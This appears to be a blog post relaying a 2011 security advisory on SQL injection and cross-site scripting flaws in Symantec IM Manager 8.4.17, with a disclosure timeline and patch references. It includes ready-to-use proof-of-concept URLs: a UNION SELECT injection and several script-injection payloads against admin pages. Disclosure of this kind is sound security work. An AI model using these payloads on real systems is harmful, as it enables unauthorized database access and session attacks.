Symantec IM Manager offers instant messaging management and security with support for public IM networks and enterprise IM platforms including AOL, Jabber, IBM Lotus Instant Messaging, ICQ, MSN Messenger, Microsoft Live Communications Server, Reuters, Yahoo! and GoogleTalk.
Sow Ching Shiong, an independent vulnerability researcher has discovered multiple vulnerabilities in Symantec IM Manager. These issues were discovered in a default installation of Symantec IM Manager 8.4.17. Other earlier versions may also be affected.
Proof of concept
SQL Injection
==========
http://[target]/IMManager/admin/IMAdminPolicyEnfQry.asp?PolicyEnfType=-1%20UNION%20ALL%20SELECT%20null,(char(126)%2bchar(39)%2b(Select%20@@version)%2bchar(39)%2bchar(126))--
====================
- http://[target]/IMManager/admin/IMAdminSystemDashboard.asp?post=yes&refreshRateSetting='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E
- http://[target]/IMManager/admin/IMAdminTOC_simple.asp?nav='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E&menuitem=newReports
- http://[target]/IMManager/admin/IMAdminTOC_simple.asp?nav=reports&menuitem='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E
- http://[target]/IMManager/admin/IMAdminEdituser.asp?action='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E
Solution
Symantec has released patches which address these issues. Please see the references for more information.
References
Vendor URL: http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2011&suid=20110929_00
Secunia: http://secunia.com/advisories/43157/
Disclosure Timeline
2011-02-18 - Vulnerabilities discovered.
2011-02-18 - Vulnerabilities reported to Secunia.
2011-02-23 - Secunia confirmed the vulnerabilities and contacted the vendor.
2011-09-29 - Patch released.
2011-09-30 - Advisory published by Secunia.
No comments:
Post a Comment
Note: Only a member of this blog may post a comment.